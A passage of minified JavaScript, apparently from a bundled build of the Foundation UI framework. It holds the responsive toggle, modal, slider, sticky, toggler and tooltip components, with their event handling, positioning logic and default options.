t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,r["a"]),l(i,[{key:"_setup",value:function(e,t){this.$element=o()(e),this.options=o.a.extend({},i.defaults,this.$element.data(),t),this.className="ResponsiveToggle",this._init(),this._events()}},{key:"_init",value:function(){s.a._init();var t=this.$element.data("responsive-toggle");if(t||console.error("Your tab bar needs an ID of a Menu as the value of data-tab-bar."),this.$targetMenu=o()("#"+t),this.$toggler=this.$element.find("[data-toggle]").filter(function(){var e=o()(this).data("toggle");return e===t||""===e}),this.options=o.a.extend({},this.options,this.$targetMenu.data()),this.options.animate){var e=this.options.animate.split(" ");this.animationIn=e[0],this.animationOut=e[1]||null}this._update()}},{key:"_events",value:function(){this._updateMqHandler=this._update.bind(this),o()(window).on("changed.zf.mediaquery",this._updateMqHandler),this.$toggler.on("click.zf.responsiveToggle",this.toggleMenu.bind(this))}},{key:"_update",value:function(){s.a.atLeast(this.options.hideFor)?(this.$element.hide(),this.$targetMenu.show()):(this.$element.show(),this.$targetMenu.hide())}},{key:"toggleMenu",value:function(){var e=this;s.a.atLeast(this.options.hideFor)||(this.options.animate?this.$targetMenu.is(":hidden")?a.a.animateIn(this.$targetMenu,this.animationIn,function(){e.$element.trigger("toggled.zf.responsiveToggle"),e.$targetMenu.find("[data-mutate]").triggerHandler("mutateme.zf.trigger")}):a.a.animateOut(this.$targetMenu,this.animationOut,function(){e.$element.trigger("toggled.zf.responsiveToggle")}):(this.$targetMenu.toggle(0),this.$targetMenu.find("[data-mutate]").trigger("mutateme.zf.trigger"),this.$element.trigger("toggled.zf.responsiveToggle")))}},{key:"_destroy",value:function(){this.$element.off(".zf.responsiveToggle"),this.$toggler.off(".zf.responsiveToggle"),o()(window).off("changed.zf.mediaquery",this._updateMqHandler)}}]),i}();c.defaults={hideFor:"medium",animate:!1}},function(e,t,i){"use strict";function n(){return/iP(ad|hone|od).*OS/.test(window.navigator.userAgent)||/Android/.test(window.navigator.userAgent)}i.d(t,"a",function(){return h});var o=i(0),a=i.n(o),s=i(3),r=i(4),l=i(6),c=i(2),u=i(5),d=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),h=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,c["a"]),d(i,[{key:"_setup",value:function(e,t){this.$element=e,this.options=a.a.extend({},i.defaults,this.$element.data(),t),this.className="Reveal",this._init(),u.a.init(a.a),s.a.register("Reveal",{ESCAPE:"close"})}},{key:"_init",value:function(){r.a._init(),this.id=this.$element.attr("id"),this.isActive=!1,this.cached={mq:r.a.current},this.isMobile=n(),this.$anchor=a()('[data-open="'+this.id+'"]').length?a()('[data-open="'+this.id+'"]'):a()('[data-toggle="'+this.id+'"]'),this.$anchor.attr({"aria-controls":this.id,"aria-haspopup":!0,tabindex:0}),(this.options.fullScreen||this.$element.hasClass("full"))&&(this.options.fullScreen=!0,this.options.overlay=!1),this.options.overlay&&!this.$overlay&&(this.$overlay=this._makeOverlay(this.id)),this.$element.attr({role:"dialog","aria-hidden":!0,"data-yeti-box":this.id,"data-resize":this.id}),this.$overlay?this.$element.detach().appendTo(this.$overlay):(this.$element.detach().appendTo(a()(this.options.appendTo)),this.$element.addClass("without-overlay")),this._events(),this.options.deepLink&&window.location.hash==="#"+this.id&&a()(window).one("load.zf.reveal",this.open.bind(this))}},{key:"_makeOverlay",value:function(){var e="";return this.options.additionalOverlayClasses&&(e=" "+this.options.additionalOverlayClasses),a()("<div></div>").addClass("reveal-overlay"+e).appendTo(this.options.appendTo)}},{key:"_updatePosition",value:function(){var e,t,i=this.$element.outerWidth(),n=a()(window).width(),o=this.$element.outerHeight(),s=a()(window).height();e="auto"===this.options.hOffset?parseInt((n-i)/2,10):parseInt(this.options.hOffset,10),t="auto"===this.options.vOffset?s<o?parseInt(Math.min(100,s/10),10):parseInt((s-o)/4,10):parseInt(this.options.vOffset,10),this.$element.css({top:t+"px"}),this.$overlay&&"auto"===this.options.hOffset||(this.$element.css({left:e+"px"}),this.$element.css({margin:"0px"}))}},{key:"_events",value:function(){var i=this,n=this;this.$element.on({"open.zf.trigger":this.open.bind(this),"close.zf.trigger":function(e,t){if(e.target===n.$element[0]||a()(e.target).parents("[data-closable]")[0]===t)return i.close.apply(i)},"toggle.zf.trigger":this.toggle.bind(this),"resizeme.zf.trigger":function(){n._updatePosition()}}),this.options.closeOnClick&&this.options.overlay&&this.$overlay.off(".zf.reveal").on("click.zf.reveal",function(e){e.target!==n.$element[0]&&!a.a.contains(n.$element[0],e.target)&&a.a.contains(document,e.target)&&n.close()}),this.options.deepLink&&a()(window).on("popstate.zf.reveal:"+this.id,this._handleState.bind(this))}},{key:"_handleState",value:function(e){window.location.hash!=="#"+this.id||this.isActive?this.close():this.open()}},{key:"open",value:function(){function e(){n.isMobile?(n.originalScrollPos||(n.originalScrollPos=window.pageYOffset),a()("html, body").addClass("is-reveal-open")):a()("body").addClass("is-reveal-open")}var t=this;if(this.options.deepLink){var i="#"+this.id;window.history.pushState?this.options.updateHistory?window.history.pushState({},"",i):window.history.replaceState({},"",i):window.location.hash=i}this.isActive=!0,this.$element.css({visibility:"hidden"}).show().scrollTop(0),this.options.overlay&&this.$overlay.css({visibility:"hidden"}).show(),this._updatePosition(),this.$element.hide().css({visibility:""}),this.$overlay&&(this.$overlay.css({visibility:""}).hide(),this.$element.hasClass("fast")?this.$overlay.addClass("fast"):this.$element.hasClass("slow")&&this.$overlay.addClass("slow")),this.options.multipleOpened||this.$element.trigger("closeme.zf.reveal",this.id);var n=this;if(this.options.animationIn){this.options.overlay&&l.a.animateIn(this.$overlay,"fade-in"),l.a.animateIn(this.$element,this.options.animationIn,function(){t.$element&&(t.focusableElements=s.a.findFocusable(t.$element),n.$element.attr({"aria-hidden":!1,tabindex:-1}).focus(),e(),s.a.trapFocus(n.$element))})}else this.options.overlay&&this.$overlay.show(0),this.$element.show(this.options.showDelay);this.$element.attr({"aria-hidden":!1,tabindex:-1}).focus(),s.a.trapFocus(this.$element),e(),this._extraHandlers(),this.$element.trigger("open.zf.reveal")}},{key:"_extraHandlers",value:function(){var t=this;this.$element&&(this.focusableElements=s.a.findFocusable(this.$element),this.options.overlay||!this.options.closeOnClick||this.options.fullScreen||a()("body").on("click.zf.reveal",function(e){e.target!==t.$element[0]&&!a.a.contains(t.$element[0],e.target)&&a.a.contains(document,e.target)&&t.close()}),this.options.closeOnEsc&&a()(window).on("keydown.zf.reveal",function(e){s.a.handleKey(e,"Reveal",{close:function(){t.options.closeOnEsc&&t.close()}})}))}},{key:"close",value:function(){function e(){t.isMobile?(0===a()(".reveal:visible").length&&a()("html, body").removeClass("is-reveal-open"),t.originalScrollPos&&(a()("body").scrollTop(t.originalScrollPos),t.originalScrollPos=null)):0===a()(".reveal:visible").length&&a()("body").removeClass("is-reveal-open"),s.a.releaseFocus(t.$element),t.$element.attr("aria-hidden",!0),t.$element.trigger("closed.zf.reveal")}if(!this.isActive||!this.$element.is(":visible"))return!1;var t=this;this.options.animationOut?(this.options.overlay&&l.a.animateOut(this.$overlay,"fade-out"),l.a.animateOut(this.$element,this.options.animationOut,e)):(this.$element.hide(this.options.hideDelay),this.options.overlay?this.$overlay.hide(0,e):e()),this.options.closeOnEsc&&a()(window).off("keydown.zf.reveal"),!this.options.overlay&&this.options.closeOnClick&&a()("body").off("click.zf.reveal"),this.$element.off("keydown.zf.reveal"),this.options.resetOnClose&&this.$element.html(this.$element.html()),this.isActive=!1,t.options.deepLink&&(window.history.replaceState?window.history.replaceState("",document.title,window.location.href.replace("#"+this.id,"")):window.location.hash=""),this.$anchor.focus()}},{key:"toggle",value:function(){this.isActive?this.close():this.open()}},{key:"_destroy",value:function(){this.options.overlay&&(this.$element.appendTo(a()(this.options.appendTo)),this.$overlay.hide().off().remove()),this.$element.hide().off(),this.$anchor.off(".zf"),a()(window).off(".zf.reveal:"+this.id)}}]),i}();h.defaults={animationIn:"",animationOut:"",showDelay:0,hideDelay:0,closeOnClick:!0,closeOnEsc:!0,multipleOpened:!1,vOffset:"auto",hOffset:"auto",fullScreen:!1,btmOffsetPct:10,overlay:!0,resetOnClose:!1,deepLink:!1,updateHistory:!1,appendTo:"body",additionalOverlayClasses:""}},function(e,t,_){"use strict";function x(e,t){return e/t}function m(e,t,i,n){return Math.abs(e.position()[t]+e[n]()/2-i)}_.d(t,"a",function(){return l});var i=_(0),g=_.n(i),a=_(3),C=_(6),v=_(1),n=_(2),o=_(10),s=_(5),r=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),l=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,n["a"]),r(i,[{key:"_setup",value:function(e,t){this.$element=e,this.options=g.a.extend({},i.defaults,this.$element.data(),t),this.className="Slider",o.a.init(g.a),s.a.init(g.a),this._init(),a.a.register("Slider",{ltr:{ARROW_RIGHT:"increase",ARROW_UP:"increase",ARROW_DOWN:"decrease",ARROW_LEFT:"decrease",SHIFT_ARROW_RIGHT:"increase_fast",SHIFT_ARROW_UP:"increase_fast",SHIFT_ARROW_DOWN:"decrease_fast",SHIFT_ARROW_LEFT:"decrease_fast",HOME:"min",END:"max"},rtl:{ARROW_LEFT:"increase",ARROW_RIGHT:"decrease",SHIFT_ARROW_LEFT:"increase_fast",SHIFT_ARROW_RIGHT:"decrease_fast"}})}},{key:"_init",value:function(){this.inputs=this.$element.find("input"),this.handles=this.$element.find("[data-slider-handle]"),this.$handle=this.handles.eq(0),this.$input=this.inputs.length?this.inputs.eq(0):g()("#"+this.$handle.attr("aria-controls")),this.$fill=this.$element.find("[data-slider-fill]").css(this.options.vertical?"height":"width",0);(this.options.disabled||this.$element.hasClass(this.options.disabledClass))&&(this.options.disabled=!0,this.$element.addClass(this.options.disabledClass)),this.inputs.length||(this.inputs=g()().add(this.$input),this.options.binding=!0),this._setInitAttr(0),this.handles[1]&&(this.options.doubleSided=!0,this.$handle2=this.handles.eq(1),this.$input2=1<this.inputs.length?this.inputs.eq(1):g()("#"+this.$handle2.attr("aria-controls")),this.inputs[1]||(this.inputs=this.inputs.add(this.$input2)),!0,this._setInitAttr(1)),this.setHandles(),this._events()}},{key:"setHandles",value:function(){var e=this;this.handles[1]?this._setHandlePos(this.$handle,this.inputs.eq(0).val(),!0,function(){e._setHandlePos(e.$handle2,e.inputs.eq(1).val(),!0)}):this._setHandlePos(this.$handle,this.inputs.eq(0).val(),!0)}},{key:"_reflow",value:function(){this.setHandles()}},{key:"_pctOfBar",value:function(e){var t=x(e-this.options.start,this.options.end-this.options.start);switch(this.options.positionValueFunction){case"pow":t=this._logTransform(t);break;case"log":t=this._powTransform(t)}return t.toFixed(2)}},{key:"_value",value:function(e){switch(this.options.positionValueFunction){case"pow":e=this._powTransform(e);break;case"log":e=this._logTransform(e)}return(this.options.end-this.options.start)*e+this.options.start}},{key:"_logTransform",value:function(e){return t=this.options.nonLinearBase,i=e*(this.options.nonLinearBase-1)+1,Math.log(i)/Math.log(t);var t,i}},{key:"_powTransform",value:function(e){return(Math.pow(this.options.nonLinearBase,e)-1)/(this.options.nonLinearBase-1)}},{key:"_setHandlePos",value:function(e,t,i,n){if(!this.$element.hasClass(this.options.disabledClass)){(t=parseFloat(t))<this.options.start?t=this.options.start:t>this.options.end&&(t=this.options.end);var o=this.options.doubleSided;if(this.options.vertical&&!i&&(t=this.options.end-t),o)if(0===this.handles.index(e)){var s=parseFloat(this.$handle2.attr("aria-valuenow"));t=s<=t?s-this.options.step:t}else{var a=parseFloat(this.$handle.attr("aria-valuenow"));t=t<=a?a+this.options.step:t}var r=this,l=this.options.vertical,c=l?"height":"width",u=l?"top":"left",d=e[0].getBoundingClientRect()[c],h=this.$element[0].getBoundingClientRect()[c],p=this._pctOfBar(t),f=(100*x((h-d)*p,h)).toFixed(this.options.decimal);t=parseFloat(t.toFixed(this.options.decimal));var m={};if(this._setValues(e,t),o){var g,v=0===this.handles.index(e),y=~~(100*x(d,h));if(v)m[u]=f+"%",g=parseFloat(this.$handle2[0].style[u])-f+y,n&&"function"==typeof n&&n();else{var w=parseFloat(this.$handle[0].style[u]);g=f-(isNaN(w)?(this.options.initialStart-this.options.start)/((this.options.end-this.options.start)/100):w)+y}m["min-"+c]=g+"%"}this.$element.one("finished.zf.animate",function(){r.$element.trigger("moved.zf.slider",[e])});var b=this.$element.data("dragging")?1e3/60:this.options.moveTime;_.i(C.b)(b,e,function(){isNaN(f)?e.css(u,100*p+"%"):e.css(u,f+"%"),r.options.doubleSided?r.$fill.css(m):r.$fill.css(c,100*p+"%")}),clearTimeout(r.timeout),r.timeout=setTimeout(function(){r.$element.trigger("changed.zf.slider",[e])},r.options.changedDelay)}}},{key:"_setInitAttr",value:function(e){var t=0===e?this.options.initialStart:this.options.initialEnd,i=this.inputs.eq(e).attr("id")||_.i(v.b)(6,"slider");this.inputs.eq(e).attr({id:i,max:this.options.end,min:this.options.start,step:this.options.step}),this.inputs.eq(e).val(t),this.handles.eq(e).attr({role:"slider","aria-controls":i,"aria-valuemax":this.options.end,"aria-valuemin":this.options.start,"aria-valuenow":t,"aria-orientation":this.options.vertical?"vertical":"horizontal",tabindex:0})}},{key:"_setValues",value:function(e,t){var i=this.options.doubleSided?this.handles.index(e):0;this.inputs.eq(i).val(t),e.attr("aria-valuenow",t)}},{key:"_handleEvent",value:function(e,t,i){var n,o;if(i)n=this._adjustValue(null,i),o=!0;else{e.preventDefault();var s=this.options.vertical,a=s?"height":"width",r=s?"top":"left",l=s?e.pageY:e.pageX,c=(this.$handle[0].getBoundingClientRect()[a],this.$element[0].getBoundingClientRect()[a]),u=s?g()(window).scrollTop():g()(window).scrollLeft(),d=this.$element.offset()[r];e.clientY===e.pageY&&(l+=u);var h,p=l-d,f=x(h=p<0?0:c<p?c:p,c);if(n=this._value(f),_.i(v.a)()&&!this.options.vertical&&(n=this.options.end-n),n=this._adjustValue(null,n),o=!1,!t)t=m(this.$handle,r,h,a)<=m(this.$handle2,r,h,a)?this.$handle:this.$handle2}this._setHandlePos(t,n,o)}},{key:"_adjustValue",value:function(e,t){var i,n,o,s=this.options.step,a=parseFloat(s/2);return 0===(n=(i=e?parseFloat(e.attr("aria-valuenow")):t)%s)?i:i=(o=i-n)+a<=i?o+s:o}},{key:"_events",value:function(){this._eventsForHandle(this.$handle),this.handles[1]&&this._eventsForHandle(this.$handle2)}},{key:"_eventsForHandle",value:function(t){var i,s=this;if(this.inputs.off("change.zf.slider").on("change.zf.slider",function(e){var t=s.inputs.index(g()(this));s._handleEvent(e,s.handles.eq(t),g()(this).val())}),this.options.clickSelect&&this.$element.off("click.zf.slider").on("click.zf.slider",function(e){if(s.$element.data("dragging"))return!1;g()(e.target).is("[data-slider-handle]")||(s.options.doubleSided?s._handleEvent(e):s._handleEvent(e,s.$handle))}),this.options.draggable){this.handles.addTouch();var n=g()("body");t.off("mousedown.zf.slider").on("mousedown.zf.slider",function(e){t.addClass("is-dragging"),s.$fill.addClass("is-dragging"),s.$element.data("dragging",!0),i=g()(e.currentTarget),n.on("mousemove.zf.slider",function(e){e.preventDefault(),s._handleEvent(e,i)}).on("mouseup.zf.slider",function(e){s._handleEvent(e,i),t.removeClass("is-dragging"),s.$fill.removeClass("is-dragging"),s.$element.data("dragging",!1),n.off("mousemove.zf.slider mouseup.zf.slider")})}).on("selectstart.zf.slider touchmove.zf.slider",function(e){e.preventDefault()})}t.off("keydown.zf.slider").on("keydown.zf.slider",function(e){var t,i=g()(this),n=s.options.doubleSided?s.handles.index(i):0,o=parseFloat(s.inputs.eq(n).val());a.a.handleKey(e,"Slider",{decrease:function(){t=o-s.options.step},increase:function(){t=o+s.options.step},decrease_fast:function(){t=o-10*s.options.step},increase_fast:function(){t=o+10*s.options.step},min:function(){t=s.options.start},max:function(){t=s.options.end},handled:function(){e.preventDefault(),s._setHandlePos(i,t,!0)}})})}},{key:"_destroy",value:function(){this.handles.off(".zf.slider"),this.inputs.off(".zf.slider"),this.$element.off(".zf.slider"),clearTimeout(this.timeout)}}]),i}();l.defaults={start:0,end:100,step:1,initialStart:0,initialEnd:100,binding:!1,clickSelect:!0,vertical:!1,draggable:!0,disabled:!1,doubleSided:!1,decimal:2,moveTime:200,disabledClass:"disabled",invertVertical:!1,changedDelay:500,nonLinearBase:5,positionValueFunction:"linear"}},function(e,t,n){"use strict";function r(e){return parseInt(window.getComputedStyle(document.body,null).fontSize,10)*e}n.d(t,"a",function(){return d});var i=n(0),l=n.n(i),o=n(1),c=n(4),s=n(2),a=n(5),u=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),d=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,s["a"]),u(i,[{key:"_setup",value:function(e,t){this.$element=e,this.options=l.a.extend({},i.defaults,this.$element.data(),t),this.className="Sticky",a.a.init(l.a),this._init()}},{key:"_init",value:function(){c.a._init();var e=this.$element.parent("[data-sticky-container]"),t=this.$element[0].id||n.i(o.b)(6,"sticky"),i=this;e.length?this.$container=e:(this.wasWrapped=!0,this.$element.wrap(this.options.container),this.$container=this.$element.parent()),this.$container.addClass(this.options.containerClass),this.$element.addClass(this.options.stickyClass).attr({"data-resize":t,"data-mutate":t}),""!==this.options.anchor&&l()("#"+i.options.anchor).attr({"data-mutate":t}),this.scrollCount=this.options.checkEvery,this.isStuck=!1,l()(window).one("load.zf.sticky",function(){i.containerHeight="none"==i.$element.css("display")?0:i.$element[0].getBoundingClientRect().height,i.$container.css("height",i.containerHeight),i.elemHeight=i.containerHeight,""!==i.options.anchor?i.$anchor=l()("#"+i.options.anchor):i._parsePoints(),i._setSizes(function(){var e=window.pageYOffset;i._calc(!1,e),i.isStuck||i._removeSticky(!(e>=i.topPoint))}),i._events(t.split("-").reverse().join("-"))})}},{key:"_parsePoints",value:function(){for(var e=[""==this.options.topAnchor?1:this.options.topAnchor,""==this.options.btmAnchor?document.documentElement.scrollHeight:this.options.btmAnchor],t={},i=0,n=e.length;i<n&&e[i];i++){var o;if("number"==typeof e[i])o=e[i];else{var s=e[i].split(":"),a=l()("#"+s[0]);o=a.offset().top,s[1]&&"bottom"===s[1].toLowerCase()&&(o+=a[0].getBoundingClientRect().height)}t[i]=o}this.points=t}},{key:"_events",value:function(i){var n=this,e=this.scrollListener="scroll.zf."+i;this.isOn||(this.canStick&&(this.isOn=!0,l()(window).off(e).on(e,function(e){0===n.scrollCount?(n.scrollCount=n.options.checkEvery,n._setSizes(function(){n._calc(!1,window.pageYOffset)})):(n.scrollCount--,n._calc(!1,window.pageYOffset))})),this.$element.off("resizeme.zf.trigger").on("resizeme.zf.trigger",function(e,t){n._eventsHandler(i)}),this.$element.on("mutateme.zf.trigger",function(e,t){n._eventsHandler(i)}),this.$anchor&&this.$anchor.on("mutateme.zf.trigger",function(e,t){n._eventsHandler(i)}))}},{key:"_eventsHandler",value:function(e){var t=this,i=this.scrollListener="scroll.zf."+e;t._setSizes(function(){t._calc(!1),t.canStick?t.isOn||t._events(e):t.isOn&&t._pauseListeners(i)})}},{key:"_pauseListeners",value:function(e){this.isOn=!1,l()(window).off(e),this.$element.trigger("pause.zf.sticky")}},{key:"_calc",value:function(e,t){if(e&&this._setSizes(),!this.canStick)return this.isStuck&&this._removeSticky(!0),!1;t||(t=window.pageYOffset),t>=this.topPoint?t<=this.bottomPoint?this.isStuck||this._setSticky():this.isStuck&&this._removeSticky(!1):this.isStuck&&this._removeSticky(!0)}},{key:"_setSticky",value:function(){var e=this,t=this.options.stickTo,i="top"===t?"marginTop":"marginBottom",n="top"===t?"bottom":"top",o={};o[i]=this.options[i]+"em",o[t]=0,o[n]="auto",this.isStuck=!0,this.$element.removeClass("is-anchored is-at-"+n).addClass("is-stuck is-at-"+t).css(o).trigger("sticky.zf.stuckto:"+t),this.$element.on("transitionend webkitTransitionEnd oTransitionEnd otransitionend MSTransitionEnd",function(){e._setSizes()})}},{key:"_removeSticky",value:function(e){var t=this.options.stickTo,i="top"===t,n={},o=(this.points?this.points[1]-this.points[0]:this.anchorHeight)-this.elemHeight,s=e?"top":"bottom";n[i?"marginTop":"marginBottom"]=0,n.bottom="auto",n.top=e?0:o,this.isStuck=!1,this.$element.removeClass("is-stuck is-at-"+t).addClass("is-anchored is-at-"+s).css(n).trigger("sticky.zf.unstuckfrom:"+s)}},{key:"_setSizes",value:function(e){this.canStick=c.a.is(this.options.stickyOn),this.canStick||e&&"function"==typeof e&&e();var t=this.$container[0].getBoundingClientRect().width,i=window.getComputedStyle(this.$container[0]),n=parseInt(i["padding-left"],10),o=parseInt(i["padding-right"],10);this.$anchor&&this.$anchor.length?this.anchorHeight=this.$anchor[0].getBoundingClientRect().height:this._parsePoints(),this.$element.css({"max-width":t-n-o+"px"});var s=this.$element[0].getBoundingClientRect().height||this.containerHeight;if("none"==this.$element.css("display")&&(s=0),this.containerHeight=s,this.$container.css({height:s}),this.elemHeight=s,!this.isStuck&&this.$element.hasClass("is-at-bottom")){var a=(this.points?this.points[1]-this.$container.offset().top:this.anchorHeight)-this.elemHeight;this.$element.css("top",a)}this._setBreakPoints(s,function(){e&&"function"==typeof e&&e()})}},{key:"_setBreakPoints",value:function(e,t){if(!this.canStick){if(!t||"function"!=typeof t)return!1;t()}var i=r(this.options.marginTop),n=r(this.options.marginBottom),o=this.points?this.points[0]:this.$anchor.offset().top,s=this.points?this.points[1]:o+this.anchorHeight,a=window.innerHeight;"top"===this.options.stickTo?(o-=i,s-=e+i):"bottom"===this.options.stickTo&&(o-=a-(e+n),s-=a-n),this.topPoint=o,this.bottomPoint=s,t&&"function"==typeof t&&t()}},{key:"_destroy",value:function(){this._removeSticky(!0),this.$element.removeClass(this.options.stickyClass+" is-anchored is-at-top").css({height:"",top:"",bottom:"","max-width":""}).off("resizeme.zf.trigger").off("mutateme.zf.trigger"),this.$anchor&&this.$anchor.length&&this.$anchor.off("change.zf.sticky"),l()(window).off(this.scrollListener),this.wasWrapped?this.$element.unwrap():this.$container.removeClass(this.options.containerClass).css({height:""})}}]),i}();d.defaults={container:"<div data-sticky-container></div>",stickTo:"top",anchor:"",topAnchor:"",btmAnchor:"",marginTop:1,marginBottom:1,stickyOn:"medium",stickyClass:"sticky",containerClass:"sticky-container",checkEvery:-1}},function(e,t,i){"use strict";i.d(t,"a",function(){return c});var n=i(0),o=i.n(n),s=i(6),a=i(2),r=i(5),l=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),c=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,a["a"]),l(i,[{key:"_setup",value:function(e,t){this.$element=e,this.options=o.a.extend({},i.defaults,e.data(),t),this.className="",this.className="Toggler",r.a.init(o.a),this._init(),this._events()}},{key:"_init",value:function(){var e;this.options.animate?(e=this.options.animate.split(" "),this.animationIn=e[0],this.animationOut=e[1]||null):(e=this.$element.data("toggler"),this.className="."===e[0]?e.slice(1):e);var t=this.$element[0].id;o()('[data-open="'+t+'"], [data-close="'+t+'"], [data-toggle="'+t+'"]').attr("aria-controls",t),this.$element.attr("aria-expanded",!this.$element.is(":hidden"))}},{key:"_events",value:function(){this.$element.off("toggle.zf.trigger").on("toggle.zf.trigger",this.toggle.bind(this))}},{key:"toggle",value:function(){this[this.options.animate?"_toggleAnimate":"_toggleClass"]()}},{key:"_toggleClass",value:function(){this.$element.toggleClass(this.className);var e=this.$element.hasClass(this.className);e?this.$element.trigger("on.zf.toggler"):this.$element.trigger("off.zf.toggler"),this._updateARIA(e),this.$element.find("[data-mutate]").trigger("mutateme.zf.trigger")}},{key:"_toggleAnimate",value:function(){var e=this;this.$element.is(":hidden")?s.a.animateIn(this.$element,this.animationIn,function(){e._updateARIA(!0),this.trigger("on.zf.toggler"),this.find("[data-mutate]").trigger("mutateme.zf.trigger")}):s.a.animateOut(this.$element,this.animationOut,function(){e._updateARIA(!1),this.trigger("off.zf.toggler"),this.find("[data-mutate]").trigger("mutateme.zf.trigger")})}},{key:"_updateARIA",value:function(e){this.$element.attr("aria-expanded",!!e)}},{key:"_destroy",value:function(){this.$element.off(".zf.toggler")}}]),i}();c.defaults={animate:!1}},function(e,t,n){"use strict";n.d(t,"a",function(){return d});var i=n(0),o=n.n(i),s=n(1),a=n(4),r=n(5),l=n(15),c=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),u=function e(t,i,n){null===t&&(t=Function.prototype);var o=Object.getOwnPropertyDescriptor(t,i);if(void 0===o){var s=Object.getPrototypeOf(t);return null===s?void 0:e(s,i,n)}if("value"in o)return o.value;var a=o.get;return void 0!==a?a.call(n):void 0},d=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,l["a"]),c(i,[{key:"_setup",value:function(e,t){this.$element=e,this.options=o.a.extend({},i.defaults,this.$element.data(),t),this.className="Tooltip",this.isActive=!1,this.isClick=!1,r.a.init(o.a),this._init()}},{key:"_init",value:function(){a.a._init();var e=this.$element.attr("aria-describedby")||n.i(s.b)(6,"tooltip");this.options.tipText=this.options.tipText||this.$element.attr("title"),this.template=this.options.template?o()(this.options.template):this._buildTemplate(e),this.options.allowHtml?this.template.appendTo(document.body).html(this.options.tipText).hide():this.template.appendTo(document.body).text(this.options.tipText).hide(),this.$element.attr({title:"","aria-describedby":e,"data-yeti-box":e,"data-toggle":e,"data-resize":e}).addClass(this.options.triggerClass),u(i.prototype.__proto__||Object.getPrototypeOf(i.prototype),"_init",this).call(this),this._events()}},{key:"_getDefaultPosition",value:function(){var e=this.$element[0].className.match(/\b(top|left|right|bottom)\b/g);return e?e[0]:"top"}},{key:"_getDefaultAlignment",value:function(){return"center"}},{key:"_getHOffset",value:function(){return"left"===this.position||"right"===this.position?this.options.hOffset+this.options.tooltipWidth:this.options.hOffset}},{key:"_getVOffset",value:function(){return"top"===this.position||"bottom"===this.position?this.options.vOffset+this.options.tooltipHeight:this.options.vOffset}},{key:"_buildTemplate",value:function(e){var t=(this.options.tooltipClass+" "+this.options.positionClass+" "+this.options.templateClasses).trim();return 